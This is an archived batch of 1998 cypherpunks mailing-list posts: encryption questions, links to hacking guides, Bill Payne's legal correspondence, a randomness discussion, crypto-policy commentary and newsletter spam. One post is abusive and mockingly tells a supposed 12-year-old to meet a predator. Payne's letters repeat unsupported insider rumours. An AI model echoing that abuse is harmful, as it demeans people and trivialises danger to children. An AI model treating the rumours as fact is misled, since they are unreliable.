F-Secure NameSurfer 2.0 will be available from Data Fellows' resellers
around the world in September 1998. The product will be available for all
popular UNIX platforms. Pricing will start at $990. 

About Data Fellows 

Data Fellows is one of the world's leading developers of data security
software. The company's ground-breaking F-Secure products provide a unique
combination of globally available strong encryption and revolutionary
anti-virus software. The integrated F-Secure software family provides
complete security solutions for enterprises of any size. It includes file
encryption and IPsec communication encryption products, VPN gateways,
SSH-based secure remote management software, easy-to-use solutions for
distributed DNS management, and a full range of anti-virus products for
workstations, servers and gateways.

Data Fellows is the developer of the award-winning F-PROT Professional
anti-virus product, whose scanning engine is an integral part of the
multiple engine structure of F-Secure Anti-Virus.

Data Fellows has offices in San Jose, California, and Helsinki, Finland. It
maintains a worldwide network of technical support, training and
distribution in over 80 countries. 

Since the company was founded in 1988, its annual net sales growth has
consistently been over 80%. Data Fellows belongs to an elite group of
companies with a triple-A rating from Dun & Bradstreet. The company is
privately owned. 

For further information, please contact:  

USA: 

Data Fellows Inc. 
Mr. Pirkka Palomaki, Product Manager 
Tel. +1 408 938 6700  
Fax +1 408 938 6701 
E-mail: Pirkka.Palomaki@DataFellows.com

Europe: 

Data Fellows Oy 
Mr. Jukka Kotovirta, Director of Sales 
PL 24 
FIN-02231 ESPOO 
Tel. +358 9 859 900 
Fax +358 9 8599 0599 
E-mail: Jukka.Kotovirta@DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 3 Aug 1998 06:03:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: question...
Message-ID: <199808031303.PAA13754@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



http://newdata.box.sk/neworder/harmless/GTMHH1-4.TXT
http://newdata.box.sk/neworder/harmless/GTMHH1-5.TXT

If those two don't work try:

http://neworder.box.sk/cgi-bin/marek/box/box?pwd=&prj=neworder&gfx=neworder&txt=%23Guide+to+%28mostly%29+harmless+hacking&key=gtmhh&fil=*&lan=e&userpwd=

this will give you a long list of hacking texts.  Scroll down to 1-4
and 1-5 on how to get spammers kicked off their ISP :)

---"Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph> wrote:
>
> I tried to access the document but
> I only got an error message.
> 
> Is it still online?
> 
> 
> The file....  GTMHH1-4.html     is it 1 or  l(letter).
> 
> Thanks!!
> 
> 
> Bernie
> 
> 
> 
> 
> 
>
===============================================================================
> You give the words  you have spoken,
>    it is not lended and are not taken back.
> It is like what The Corrs sung "...you're forgiven not forgotten...."
> 
> bbt@mudspring.uplb.edu.ph
> bbt@peak-two.uplb.edu.ph
> metaphone@altavista.net
> 
> 
> 

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 3 Aug 1998 06:15:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Question....
Message-ID: <199808031315.PAA15001@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





---"Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph> wrote:
>
> How does a hardware encryption device work?
> 

If the Encryption is done on a device attached to your computer
instead of in software on your computer.


> 
> Does it need human intervention to convert a plaintext to ciphertext
> or do we still give the instructions?


Depends on the device.  But most require some effort.

> 
> Correct me if I'm wrong, the key escrow is a hardware encryption
device.
> 

Key Escrow is an action taken by the government to collect or gain
access to private keys.  There was some controversy as to the clipper
chip which is hardware falling prey to key escrow however.

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 3 Aug 1998 15:23:59 -0700 (PDT)
To: senator@torricelli.senate.gov
Subject: Mitchell  8/3/98 14:18 phone conversation
Message-ID: <35C63730.1C43@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 8/3/98 3:41 PM

FAX

Jan Elizabeth Mitchell
Assistant U.S. Attorney
U.S. Department of Justice
United States Attorney
District of New Mexico
Post Office Box 607
Albuquerque, NM 87103
505/346-7274
505/766-2868
FAX 505/346-7205

Dear Ms Mitchell:

Purpose of the fax is to 

1  review points covered in our 8/3/98 14:18 phone conversation
2  suggest settlement.

You phoned me today.

You told me that you planned to file a motion or response to the Tenth
circuit's
request Morales and my response to the jurisdictional issue on the 21st
of August.

I told you that this was premature on your part since we had moved for a
second time
for an extension of time.

I told you also that this matter was now before congress.

You appeared to indicate to me that you were in the process of adding
both Morales and
Minihan as named parties in this appeal.

You asked me if it would be agreeable to us if you filed a response to
the Tenth circuit
21 days AFTER Morales and I filed our response to the Tenth circuit on
the jurisdictional
issue.

I AGREED.

I spoke to Morales on the phone shortly after our phone conversation.

Arguing points of law before court clerks and judges who have
outstanding criminal complaint
affidavits for crimes COMMITTED IN WRITING againtst them would be
unproductive on Morales and my part.

Therefore, we will proceed to resolve the criminal conduct on the part
of judges and court clerks
before we proceed further in this matter.

We will do this at the Congressional level.

Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to
properly process a valid
complaint on New Mexico district court chief judge John Conway in 1995. 
http://www.jya.com/whp071598.htm

Hatch's failure to properly respond in 1995, in large part, caused our
current legal conflict with DIR NSA Minihan.

We foresee an unfortunate escalation of hostilities if this matter
proceeds as it is.  

We do not wish this.

We seek settlement of the UNFORTUNATE matter at the earliest time.

We ask your and Congressional help to settle this UNFORTUNATE matter
before it gets WORSE.

If I have made any essential material errors in reporting my impression
of the contents of our conversation, then I would appreciate you giving
your impression of possible errors.  

You can do this in the letter you said you would write to us.

Sincerely,


bill payne
13015 Calle de Sandias NE          	        
Albuquerque, NM 87111              	        

Distribution

Senate Judiciary Committee   e-mail
Arthur R Morales e-mail






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Mon, 3 Aug 1998 01:34:25 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: Question....
In-Reply-To: <199807310655.IAA08821@replay.com>
Message-ID: <Pine.GSO.3.96.980803162428.20611A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


How does a hardware encryption device work?


Does it need human intervention to convert a plaintext to ciphertext
or do we still give the instructions?

Correct me if I'm wrong, the key escrow is a hardware encryption device.


That's all for now, thanks.



Bernie





===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...you're forgiven not forgotten...."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Mon, 3 Aug 1998 02:19:05 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: question...
In-Reply-To: <199807310655.IAA08821@replay.com>
Message-ID: <Pine.GSO.3.96.980803171600.23228A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


I tried to access the document but
I only got an error message.

Is it still online?


The file....  GTMHH1-4.html     is it 1 or  l(letter).

Thanks!!


Bernie





===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...you're forgiven not forgotten...."

bbt@mudspring.uplb.edu.ph
bbt@peak-two.uplb.edu.ph
metaphone@altavista.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: william cane <wcane2@worldnet.att.net>
Date: Tue, 4 Aug 1998 01:58:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hi! I'm only 12 years old
Message-ID: <35C6CBD4.FDE@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


Do you really have this much time on your hands? Man yer gonna attract
the wrong attention by saying that shit, your not a very convincing 12
year old, I can see the monster glow in your eyes, the same one my
sister met that day in the park.  If you are 12, and are really as
stupid as I think you are, and want to meet the 38 year old monster in
the park, Then I say go for it, hell its not like i or anyone else
really give a shit about you anyway.  And if you think this is cool,
then you are way the fuck off base.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 3 Aug 1998 19:06:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808040206.EAA31716@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	Actually, Hamre said that US companies have no Gawd-Given Right to
> _export_ strong crypto. See:
> http://www.wired.com/news/news/technology/story/14098.html

Oh, it's sick anyhow...

A couple excerpts from jya's transcript:

On the EFF DES cracker: Now, I need to explain first of all, that the
government is currently permitting the export of 56 bit encryption
algorithms.  Now, I know that there's some huffing and puffing about
whether that's strong encryption or not. But again, I say let's put this
in context.  There was a flap here the other day when, ta-da, somebody
invented a computer that could break 56 bit encryption in 30 hours or 40
hours or whatever the time was, right.  You took 40 hours to decrypt a
two-second message.  And it was good only for that one message.  You've
got to start all over again on the next two-second message.  Tell me that
that isn't strong encryption.

[Secretary Hamre, that isn't strong encryption. Weak enough that cracking
DES keys for two grand each -- reasonable price considering some of the
applications using DES -- can be a viable business for the shady hacker
type, in fact. Pays for your parts in ten months, pocket most everything
else until the machine breaks.]


On export controls: "...I'd also ask American business not to make a
campaign out of just trying to bust through export controls as though
somehow there was a God-given, inherent right to send the strongest
encryption to anybody in the world, no matter who they are.  I don't agree
with that.  I will never agree with that."

["I will never agree with that" -- I'd say we're talking to an open-minded
individual who's really trying to work things out, eh?]

> 
> 	Which, despite all the damage control and spin waves that followed
> the initial report in WiRed, does not mean that the NSA and DoD believe
> that anyone has been granted some privilege to speak in confidence that
> they, being reverent and religious fellows, should and must respect.
> 
> 	Much ado about nothing, here!
> 
> 	The first (perhaps literally erroneous) WiRed News report -- that
> senior DoD officials do not believe that any two people anywhere in the
> world have a perfect and unassailable right to speak in confidence and
> secrecy -- was spot on accurate and true.
> 
> 
> -----
> "Cryptography is like literacy in the Dark Ages. Infinitely potent, for
> good and ill... yet basically an intellectual construct, an idea, which by
> its nature will resist efforts to restrict it to bureaucrats and others who
> deem only themselves worthy of such Privilege."
> _ A Thinking man's Creed for Crypto _vbm.
> 
>  *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
>       53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 4 Aug 1998 04:42:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808041113.EAA14059@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


What characteristics make a jurisdiction (sovereign power) a good "safe-haven?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 5 Aug 1998 22:08:47 -0700 (PDT)
To: Maurice Valmont <Maurice@fundi.com>
Subject: Re: Mysterious taglines
In-Reply-To: <3.0.1.32.19980805235420.0072fa34@mail.fundi.com>
Message-ID: <Pine.BSF.3.91.980804035013.18249I-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 5 Aug 1998, Maurice Valmont wrote:

> At 04:55 PM 8/5/98 -0700, Tim May <tcmay@got.net> wrote in his .sig:
> 
> 
> >Crypto Anarchy: encryption, digital money,
> >anonymous networks, digital pseudonyms, zero
> >knowledge, reputations, information markets,
> >black markets, collapse of governments.
> 
> I'm curious: What exactly is "zero knowledge"?

I cannot discuss that here, as Tim May will likely enter the discussion 
to enforce his intellectual property rights and remind us that he 
discussed this before the rest of us were born. All worthwhile 
discussions of cryptography were held prior to 1994. This list is to be 
henceforth used for the posting of long rambling prose induced by the 
inhaling of household chemicals. Contact sniffmonger toto, check the 
archives, and bring me another scotch.

"I know nutzhing! NUTZHING!"
SGT Schultz
Stalag 13

I'd like to tell you, but I cannot tell you that which you do not already 
know.

Where on the 'net are Tartaglia and Cardano? How about Hakken and 
Appel? How many colors do you need to color a map, such that no two 
regions that share a boundary also share a color? Have I screwed up, and 
in my effort to prove to you that I know the secret, perhaps revealed it 
to you after all?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Tue, 4 Aug 1998 20:17:13 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Clinton shafted by a dress?/The art of cyber seduction
Message-ID: <19980804080001.3828.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/4/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 4 Aug 1998 07:06:14 -0700 (PDT)
To: kalliste@aci.net
Subject: Whom they will destroy they first make mad.
Message-ID: <35C7145D.5D03@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 8/4/98 7:45 AM

J Orlin Grabbe

I liked your article. http://www.aci.net/kalliste/apocalyp.htm

Reminds me of one of my favorite books.  The Great Crash by John Kenneth
Galbraith.

Since you are a Harvard grad, mathematician Garrett Birkhoff bought
me lunch at the Harvard faculty club in about 1976.

We were making plans to get a machine combinatoric and stochastic
algorithm subprogram library written.  Like LINPACK, etc.

But NSA killed that project and my NSF grant DCR75-08822.  See Bruce
Barns, the Puzzle Palace by James Bamford.

We returned from Durango on Monday afternoon.

I have some INSIDE news from the wife of a former AF base commander in
Turkey about

	1  Ron Brown's flight
	2  Khobar towers

1  The AF warned the White House not to fly Brown's flight because of
bad weather. Advice issued from Ramstein. Advice ignored.

White House removed Ramstein AF base commander.

2  AF base commander was removed for the Khobar incident although base
commander had nothing to do with lack of security.

Former Kirland AFB and new base commander are buddies with our friends
in Durango.

I think that we have made the government MAD.
http://jya.com/whpfiles.htm

Wayland told me yesterday that the Texas A&M profs went over the reasons
for
rejection of their SBIR grant.

One of the MAIN reasons, Wayland told me, was the grant did not
spell-out the
WAY the profs were going to IMPLEMENT their idea.

My attached method for ACCOMPLISHING the goal was included with the
prof's
REQUESTED revision of their SBIR grant, Wayland told me.

I am getting enmeshed in techie stuff.  

I need and WANT to finish the digital FX PRONTO.

Let's all hope for settlement of the UNFORTUNATE mess before it gets
WORSE.

bill


Tuesday 8/4/98 7:06 AM

tech@cyberpowersystems.com
www.cyberpowersystems.com
512/238-9905

Yesterday I was trying to send a e-mail QUICK.  

I did not close the PowerPanel Window before invoking IE and the
external
ZOOM Flex modem software.

Dial-Up Networking window in Windows 95B reads

	!  The modem is being used by another Dial-Up Networking connection or
	    another program.  Disconnect the other connection or close the
program, and
	    then try again

					OK

I disabled the decode on the Superhigh Speed Serial Card by NOT
JUMPERing any addresses.

Guys, it appears to me AT THE MOMENT that the problem is that the
CyberPower code is interfering with the Dial-Up Networking software
within Windows 95.

It would be nice to be able to use BOTH the CyberPower auto shutdown
feature and Internet at the same time.

I realize that the software problem is likely in Windows 95 but I am NOT
OPTIMISTIC that Microsoft
will fix the problem.  Therefore.

Got any fixes?  

I will phone tech support later today.  I am not reading e-mail.

Thanks in advance.

bill


         	WEED KILLER computer interface proposal section 7/27/98 10:11 AM

Solution to controlling and collecting data from the WEED KILLER involves interfacing a personal computer
running a version of the Windows operating system to the WEED KILLER analog/digital hardware.

Windows is not a real-time operating system, therefore  microcontroller controller/collector hardware 
interface must be installed between a Wintel PC and the WEED KILLER hardware.

Essence of the Wintel data collector problem is that Windows 3.x or 9x responds to a hardware interrupt
usually between 70 to 150 microseconds.  In rare occasions the interrupt latency may extend to 1.5 
milliseconds or even longer.  A microcontroller responds to an interrupt in several microseconds.

Wintel hardware controller interface is even more difficult than collection for the reason that the Windows 
operating system only gives control to an application when Windows decides.  In the collection, mode at
least a hardware interrupt signals Windows that the application wants control.  However, the microcontroller
can send the Wintel an interrupt asking the applications code whether there is any message it needs to
send the microcontroller.

Microcontrollers have specialized timers, serial expansion ports and are, therefore, designed to be interfaced to 
analog and digital hardware. 

An 80C32 family microcontroller is proposed for the WEED KILLER application for reasons.

1  The 80C32 will do the job.

2  Multiple vendors of 80C32 guarantee future supply at a competitive price.  Current suppliers include
 Intel, AMD, Winbond, Dallas, Philips, Siemens, OKI,  ATMEL, ... 

3  High-speed parallel port bi-directional IEEE 1284 enhanced capability port 9 (ecp) communications 
hardware between an 80C32 and PC is in the final stage of development.

4  IEEE 1284 hardware drivers are supplied with Windows NT.  Custom assembler dll drivers are available
for 9x and 3.x.

5  A public-domain Forth 8051 operating system hosting a high-level language and interactive assembler with 
complete source code documentation is available on Internet. http://jya.com/f86/whpf86.htm

Hardcover book further documenting 5 is available from Academic Press.
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Only a Wintel machine is required for both hardware and software for the WEED KILLER project.  

Usually a Forth hardware/software development probject on requres a voltmeter, logic probe, and, 
infrequently, an oscilloscope.  Reason  is the INTERACTIVE control of the hardware and software
from a PC keyboard and diagnostic information easily printed to a PC monitor.

Justification for assertion made in the above paragraph comes from Internet.

NASA uses Forth extensively for its space programs. http://groucho.gsfc.nasa.gov/forth/

Ballard used polyForth http://av.yahoo.com/bin/query?p=polyforth&z=2&hc=0&hs=0
to locate wrecks of the Titanic, Bismarck, and Yorktown.
http://www.nationalgeographic.com/features/98/midway

Sun Microsystems workstation boot into Forth then invokes Solaris. http://playground.sun.com/pub/1275/

Adobe Postscript is a version of Forth. 
http://www.mactech.com/articles/mactech/language/forth-postscript.html

Video game software are written mostly in Forth.

The Wintel side of the WEED KILLER project will be most-likely written in a small
amount of assembler interface code and Visual Basic.

While Forth threaded code software technology is extremely valuable in some settings,
it is not in others.

Java is a variation of Forth.  http://www.mrl.nyu.edu/meyer/jvmref/

Future of Java on Wintel machines is unclear at this time.

For example,

  The hottest items among techies is a browser called Opera.   
  This is a $40 shareware program that in speed and compact   
  size buts both IE and Communicator to shame.  It has a slightly   
  different interface from either of the majors - an interface some find    
  refreshing while other find less than useful.  As it's shareware, you can   
  try and then buy if you like it.  One reason for its speed is that it ignores   
  Java - the Internet's Bandwidth Pig (IBP).   
 
  The Rumor Mill by Paul Cassel
  ComputerScene Magazine  July 1998   
   
Forth executes code High-level at about 10% the speed of a compiled high-level
language.

Speed of execution of small applications is not effected by Forth's slow execution.

Reason is that initial code is written in high-level Forth.  

Inner loops are then translated into Forth assembler.

Speed is maintained with the advantage that data structures are created an maintained in
high-level language while the interactive operating system is retained for trouble shooting
both hardware and software problem.

Hardware cost of building the 80C32 the WEED KILLER boards is estimated at $10k.

Hardware design is estimated at 1 month labor at $50/hr for a total of $8k.

Software development on the 80C32 side in Forth and Forth assembler, software on the
Wintel side in Visual Basic and assembler, documentation, and training is estimated to
be 4 months for a total of $32k
   
 /\/\/\
end



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Savo <admin@max-web.com>
Date: Tue, 4 Aug 1998 10:17:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: FM radio hiss etc.
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <3.0.5.32.19980804101456.007bc750@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:56 AM 8/3/98 -0000, you wrote:
>Hi,
>Dumb as I am, I have a question about retrieving random stuff out off radio
>hiss:
>
>If it is/could be possible with FM hiss, is it possible too with a
>recording of, for example, a leeking faucet, tree-hiss forced by the wind,
>a sack of beads falling to te ground, even the sound of a shower, etc.? And

I don't see why not. If you got a high enough sampling rate (44khz should
do nicely), and set a peek threshold so anything under a certian volume was
a 0 and every peek over was a 1 I could think of a BUNCH of samples that
with a little playing with the threshold could produce some pretty random
resluts. Furthermore, by adjusting the threshhold you would get a toatly
different number. Using a random sampling with a random threshhold would
bring you closer to a truely random number. Of corse it's still not
possible to get a truely random number because you gotta get the threshold
value somehow... see below for why...

>what is, by the way, TRULY randomness - could that ever be reached? I have
>a bold assumption: it never can be.

That was my understanding, but I'm no expert on the subject. 

>Housenumbers aren't good for that - that *I* know.

Absolutely, because the seed is not truely random. For instance, most
random number generators use the current time from the internal clock to
generate a random number. However if you were to do the exact same thing at
the exact same time (down to the millisecond) it would reproduce the same
number.

If you try this let me know what you find!

>Chris Harwig
>Nieuwegein, The United Netherlands
><chrisharwig@hetnet.nl> (no acces to the Internet; due to lack of money...)
>
>(I am not a native English speaker - as you probably see.)
>
>P.S. I can't help it: I miss Linda Reed fka Linda Reed...
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 4 Aug 1998 14:15:46 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 4, 1998
Message-ID: <199808041802.NAA17167@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a multi-part message in MIME format.

------ =_NextPart_000_01BDBFAE.8681CC30
Content-Type: multipart/alternative;
	boundary="---- =_NextPart_001_01BDBFAE.8684D970"



------ =_NextPart_001_01BDBFAE.8684D970
Content-Type: text/plain

==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here!
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com
===========================================



------ =_NextPart_001_01BDBFAE.8684D970
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Dus-ascii">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.0.1458.49">

</HEAD>
<BODY>
<P><FONT COLOR=3D"#FF00FF" =
SIZE=3D2>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D</FONT><B=
R>
<FONT COLOR=3D"#000000" SIZE=3D2>Welcome to today's edition of the CTIA =
Daily News</FONT><BR>
<FONT COLOR=3D"#000000" SIZE=3D2>from WOW-COM.&nbsp; Please click on =
the icon / attachment</FONT><BR>
<FONT COLOR=3D"#000000" SIZE=3D2>for the most important news in =
wireless communications today.</FONT><BR>
<BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>A new multi-billion dollar industry is =
here! </FONT><BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>Be at CTIA's WIRELESS I.T. =
'98</FONT><BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>where personal computing and =
communications converge!</FONT><BR>
<BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>Don't Miss Your Chance -- October =
12-14, 1998</FONT><BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>Bally's Las Vegas, Las Vegas, =
NV</FONT><BR>
<BR>
<FONT COLOR=3D"#FF00FF" SIZE=3D2>For more information, visit =
</FONT><U><FONT COLOR=3D"#0000FF" SIZE=3D2><A =
HREF=3D"http://www.wirelessit.com" =
TARGET=3D"_blank">http://www.wirelessit.com</A>&nbsp;</FONT></U><BR>
<FONT COLOR=3D"#FF00FF" =
SIZE=3D2>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D</FONT=
><BR>

<BR><FONT SIZE=3D2> </FONT>
</P>

</BODY>
</HTML>
------ =_NextPart_001_01BDBFAE.8684D970--
------ =_NextPart_000_01BDBFAE.8681CC30
Content-Type: application/octet-stream;
	name="_CTIA_Daily_News_19980804.htm"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="_CTIA_Daily_News_19980804.htm"

<HTML>
<HEAD>
   <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1">
   <META NAME=3D"Author" CONTENT=3D"CTIA Editorial Staff">
   <META NAME=3D"GENERATOR" CONTENT=3D"Mozilla/4.02 [en] (Win95; I) =
[Netscape]">
   <TITLE>_CTIA Daily News From WOW-COM_</TITLE>
</HEAD>
<BODY>
&nbsp;
<CENTER><TABLE BORDER=3D0 COLS=3D2 WIDTH=3D"600" >
<TR>
<TD><A HREF=3D"http://www.wow-com.com"><IMG =
SRC=3D"http://www.wow-com.com/images/homehed_test.gif" =
ALT=3D"WOW-COM.COM" NOSAVE BORDER=3D0 HEIGHT=3D89 WIDTH=3D275></A></TD>

<TD>
<CENTER><A HREF=3D"http://www.nokia.com"><IMG SRC=3D"4nokia.gif" =
ALT=3D"Today's News Sponsored by Nokia" BORDER=3D0 HEIGHT=3D50 =
WIDTH=3D250></A></CENTER>
</TD>
</TR>
</TABLE></CENTER>

<CENTER>&nbsp;</CENTER>

<CENTER><TABLE BORDER=3D0 WIDTH=3D"600" >
<TR BGCOLOR=3D"#000099">
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT COLOR=3D"#CCCCCC"><FONT =
SIZE=3D+1>CTIA
Daily News from WOW-COM - August 4, 1998</FONT></FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD>
<HR WIDTH=3D"580"></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Motorola Forms =
New Internet
and Connectivity Services Division</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Motorola ICSD will focus on =
developing
products and services that simplify consumer communications including =
speech-enabled,
web-based, content, in-vehicle and paging information services.&nbsp; =
(<A =
HREF=3D"http://www.news.com/News/Item/Textonly/0,25,24904,00.html?pfv">N=
EWS.COM</A>)
- (<A =
HREF=3D"http://biz.yahoo.com/finance/980804/motorola_m_1.html">YAHOO</A>=
)
- (<A =
HREF=3D"http://www.bloomberg.com/news2.cgi?T=3Dtechnews.ht&s=3D569073630=
">BLOOMBERG</A>)
- (<A =
HREF=3D"http://www.zdnet.com/zdnn/filters/bursts/0,3422,2125030,00.html"=
>ZDNET</A>)&nbsp;</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT =
SIZE=3D+1>Telecommunications Companies
Getting Better&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>at Keeping =
Customers
Loyal</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">According to Arthur Andersen's 1998 =
American
Customer Satisfaction Index, telecommunications companies are getting =
better
at taking care of their customers.&nbsp; The modest improvement (from =
65
to 66 on a 100-point scale) is said to result from investments in =
sophisticated
call-center technology, special customer services and targeted products
and prices. (<A =
HREF=3D"http://biz.yahoo.com/prnews/980804/il_arthur__1.html">YAHOO</A>)=
</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>House Commerce =
Committee
Chairman Blasts FCC&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>for Giving =
Spectrum to
Teligent&nbsp;</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">House Commerce Committee Chairman =
Thomas
W. Bliley (R-Va.) said the FCC appears to have "manufactured" a =
national
security need to justify its allocation of a valuable airwave spectrum
to a private company without a public proceeding and at no additional =
cost.&nbsp;
The FCC's March 1997 decision shifts Teligent Inc.'s licenses for =
Digital
Electronic Messaging Services from the 18-gigahertz tier to the 24-GHz
tier - in effect, quadrupling the portion of the airwaves it could take
up. (<A =
HREF=3D"http://www.zdnet.com/intweek/daily/980803a.html">ZDNET</A>)&nbsp=
;</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>FCC to Hold =
Hearings
on Universal Service E-Rate</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Figures released by the U.S. =
Department
of Commerce show a widening gap in access to basic telephone services,
as well as computer technology between rich and poor, and between races
regardless of income level.&nbsp; The hearings will investigate ways to
close this "digital divide."&nbsp; Currently, the FCC administers a =
controversial
program that is funded by fees charged to telecommunications providers.
(<A =
HREF=3D"http://www.news.com/News/Item/Textonly/0,25,24897,00.html?pfv">N=
EWS.COM</A>)
- (<A =
